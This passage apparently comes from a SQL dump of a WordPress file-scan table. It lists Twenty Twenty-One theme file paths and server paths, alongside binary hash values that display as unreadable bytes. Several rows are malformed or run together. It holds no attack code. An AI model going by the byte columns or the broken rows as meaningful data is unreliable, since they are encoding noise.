','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' *8b0eG','%B\0/\"k\0H>\0T!s]ݷ','',0,'?'),('] n_ˤ[l','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')y?>F\n~^','Z\n\r~YWmU9FtQ','',0,'?'),('K}{XUG9ᠼU/G@','oyJ(Bf2H\'h! \'* ɹ*','',0,'?'),('O4%m','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k4#j\nc','n%a kXEȭHȒwh','',0,'?'),('ĦSNLh`','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4–ĊK$&=^','AU:·1kqHvr3M','',0,'?'),('FUGХdcNC','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al͟\ZԀc','x(Sn\n;y{%_j/','',0,'?'),('=A3Zi-','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nsn 1MQ(f','rJ6 Y;U&4=5KQia','',0,'?'),('MwMf0b\\','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i+>*Ař','{Z>1k||}PCTCA','',0,'?'),('2J0xYr','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bQ[릶',')t1@1\0ו KW\0','',0,'?'),('mDڜ(\r ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Rd#\r\"%','ݩFs3Gb8N@X','',0,'?'),('>\nqg/','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mXygr\"3g','a55\Z\\7w{Լ^dTK','',0,'?'),(' 8[wt?X扊>V}€','',0,'?'),('ݦ{bh0Q','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6ߔuUŽQ(AF','̩\ZTQb[cU,s~$F_\ne ','',0,'?'),('΂v0rm','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6ߔuUŽQ(AF','̩\ZTQb[cU,s~$F_\ne ','',0,'?'),('}L;],','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',([\0b۪z',')Y|\nA0a\r%inߞkMjC\'','',0,'?'),('vv̞etѿ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-OaY?ai0@6 ','\rL&ބ\0}muLJ i..5Gl','',0,'?'),('F}3(̬OI ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j;ʻ#qb','m7wW&emC1ac =27','',0,'?'),('1A,\nsv','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y)ɾNS(! 4Z','/[f nU!798^94M','',0,'?'),('і\"sk83','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ә)n','(%L{0d &X2I\Zʜgq','',0,'?'),('<Q_4t','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{G(땤h','zХY\'RHyRiV~\nȿy','',0,'?'),('nM\02]\r^r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/\nBt;','VYj8b5fc]7WiƘ2HN}2^','',0,'?'),('?7`9Å','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"IfDS~Ee;\"','-L\\Z%Er_^nniWB-mC5A','',0,'?'),('!߬vg1IV|E','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[<ԉ1-3','wB;\\q\\8N !-X !\n','',0,'?'),(' )& M2D\rYU^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g8vw5ǿ','Vsyf(G8hM\Zj','',0,'?'),('Vr^T2XO','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yB ?{n\Z','tp1\ZQU|O\Z(0\"tV[','',0,'?'),('*mBvH\ne','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fMiGxVs','iY4t4|->1]f)JIZl','',0,'?'),('lbɌr^z#','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}@\"O',',U<Ґ2zHwcB','',0,'?'),('-aTޱXJ ϓ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M@-~Vrq<','BU\n^EFEי慎qd','',0,'?'),('lUy:e4N1ϻo','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']/\07(r^','8UGS5lrx\\)\n','',0,'?'),('3T,M nÀ4','wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ۓbhX','ڊj9yv\noC/`ny','',0,'?'),('4K9?\'҆','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZtŽЋj?','Gc3I>έj_/*D','',0,'?'),('\n!^划 T\n','wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F5vElTͤQ5','WF:ڮU3dm0 ','',0,'?'),(':[fKZ?','wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']N.,','rŃM\n.HD3wmyb','',0,'?'),('\"\ro]\r:T0ۓ%','wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k/Fct','J%g\0L;7R','',0,'?'),('w.(S*Ie','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nBj',')io[G\ZC)Eϳl\rhd!','',0,'?'),('|xYiF','wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۇS9xL8','(D\ZokUBO)Cx\\iMoN','',0,'?'),('K\'\Zxrx','wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϙd#y','&3p8-\rlt3hyefQrJJ','',0,'?'),('#}saa ,!','wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',50~',';{֗88}\r|ѫ^@Fj','',0,'?'),('$=ZZHɼf','wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f&ӫ\n])jjڝ','Ø{X#ރ\Z\nvp\rB','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dN#vksz','w;[f]XÞ &y2,F','',0,'?'),('r[s2<u','wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\nYg1b','',0,'?'),('~^%A','wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{8@Iz}g','w][fv\\mS^F\rsd~\'','',0,'?'),('D`q&2','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']H9\0$a','cf}uh&','',0,'?'),('8Gxo\\U[','wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','։(ΰc?k(YW','rtPSsx\0˖☤xA|.','',0,'?'),('ZPe2I [͠','wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Es)N','p<*wbEHzL%Uc(,?)z','',0,'?'),('\'=-AC\\K','wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','esAqtf>\Z9','k:4j($緪c','',0,'?'),('dRĆCPb&','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rWН','%?\Zvbq]g5Z)uѶ\Zo\'0','',0,'?'),('/','',0,'?'),('\Zpe5\'<','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \\`qD@9~','1*z+z6(cVϙ{Vշ','',0,'?'),('x\nA[*ZxS9NY','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')M+.x','v*#( RhL Fox','',0,'?'),('ne;<','wp-content/themes/twentytwentyone/assets/sass/style-editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2bk.8oUl','x?&\"BJ\Z 6Qf8E6^KUq\'O','',0,'?'),('ҘG\":0\\KH#','wp-content/themes/twentytwentyone/assets/sass/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u]ބ-H!|旍~Ig','kԨ\nARX(}&܌\nl(A5<','',0,'?'),('D=nvbP._ ','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|AsqE','֭}YT3l\\\Z<oâ','',0,'?'),('CC*v\0_\0','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!=n ;','p&kgqp tmOüJ\0c','',0,'?'),('PB\nZY P','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?-jl\0+','?dRڣB>JmўO$ǡH','',0,'?'),('a~*k`Dnp}f','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vl\rg\' \'','H>S|F 0[bI','',0,'?'),('Wdl\09?i','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}9+㢾wL|F','g nͳ,zI(|ɪ','',0,'?'),('UW~/N ','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZEqf$jpn#~','G٢LF!ݿ]n#25','',0,'?'),('+ipZӶtB','wp-content/themes/twentytwentyone/comments.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m&)fx)',' ]5}ԃij“MP\rսϢ','',0,'?'),('+Fc0m_Ii','wp-content/themes/twentytwentyone/footer.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9h4~EmHCv','0\\cRhK !^W\'','',0,'?'),('ǭkOl 9ڇJ','wp-content/themes/twentytwentyone/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%1rLre~\0','SWjHc4+{kZbT','',0,'?'),('ߤ.?`gYX','wp-content/themes/twentytwentyone/header.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f6!/pg','bh=cw\'\Zb=%WBt1stNb','',0,'?'),(' Mu)`>2','wp-content/themes/twentytwentyone/image.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Į?˕HoU','ra\"U7@pJE#z:e`, ','',0,'?'),('Q%rT>!e_zE','wp-content/themes/twentytwentyone/inc/back-compat.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jՏ,;\"]&','\'ߍ\0`qֶp~rI{','',0,'?'),('Kǥݳ|u','wp-content/themes/twentytwentyone/inc/block-patterns.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jB OKB\"','XV/Bae)uV-%','',0,'?'),('\r)51T o','wp-content/themes/twentytwentyone/inc/block-styles.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t@/ߢ@eR','r4wz ZZS$','',0,'?'),('V.`Jxbey','wp-content/themes/twentytwentyone/inc/custom-css.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\07 |]C','@msǬ}t!\0$','',0,'?'),('&.CFh\\-2','wp-content/themes/twentytwentyone/inc/menu-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/menu-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yZb6A^',']XG8\0Y`LR1 qfy,56','',0,'?'),('3X/\'P','wp-content/themes/twentytwentyone/inc/starter-content.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B$N/ϫ 7l]N(','\\8nRΪJ?','wp-content/themes/twentytwentyone/page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G:Ll}\0!%','mDTZ\rτ(czGܟKl@Kv','',0,'?'),('|`yYĶo','wp-content/themes/twentytwentyone/postcss.config.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|LC\0%e?','96ѡƳﴓt_Tts','',0,'?'),('px\\?;hE/','wp-content/themes/twentytwentyone/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',g#/a#c','\07KaH@UIm%Ox','',0,'?'),('&)N~&','wp-content/themes/twentytwentyone/screenshot.png','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ّ^R ','\Zu@\'\\KL82Br\Z2HCo','',0,'?'),('H_XЅgU','wp-content/themes/twentytwentyone/search.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL6-!讜kyt','\0Q#*^_(VY&I@‰H҇[','',0,'?'),('&½1YxFumpC','wp-content/themes/twentytwentyone/template-parts/content/content-page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wq@rW:s^\n!','Oҏ<餫q2d\r,w) ','',0,'?'),('Ӂl-y4Ngp0','wp-content/themes/twentytwentyone/template-parts/content/content-single.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0F\ZLOk:','Z8!!P8~\0eh','',0,'?'),('^ǿ+C%Kx','wp-content/themes/twentytwentyone/template-parts/content/content.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ,*]1n','0CfIΰaBqG8Ou>Wþ','',0,'?'),('S{|\"uZz','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ma','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3=4+2]','i\Z%2l@uFi=_\0Pհ','',0,'?'),('\"e–AlBE/','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vhlZ.]m`q`','Ȧ({rE(ug_ ܹ k\rP`8c','',0,'?'),('ÖvhlP','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ZobS\ng5','\n)^ `-/3{):?','',0,'?'),('5uuȸ8PҺ','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊:嵷Y','&yZen_&0A 5','',0,'?'),('YUh|kU$;˜','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DZcժhǗ','x\n sd26*Pꫡft45bz','',0,'?'),(':\\ܹ\r@L\":U','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eLFT2ѮHe','MD\nR卸X=jн','',0,'?'),('쩯b/y;f','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nheS,!',',GKfoat}߆#Zsv\'','',0,'?'),('noy','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>_\n\Zt','>M,Aak\0m,D','',0,'?'),('a0}踀@~','wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n}S=]','Kx,V7[{\n{etc4g','',0,'?'),('{@qmu','wp-content/themes/twentytwentyone/template-parts/header/entry-header.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TE50QD=l','2&.(SGl^NC&/ρ','',0,'?'),('Hmϡ\n\0M}0\"ؒ','wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%LAZ;ߪu',' wMӳY\r%%\'aOA&x','',0,'?'),('f *pd \n^','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZSzCn:','䠦cirfoz1B+','',0,'?'),('h?@','',0,'?'),('N: @kς','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\Ztz&S4\Z','M8B\0Z?$y3UeZI','',0,'?'),('۷\n/','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nƭ`dv','oWap)=q#{d6x(DE ','',0,'?'),(',8zfD7 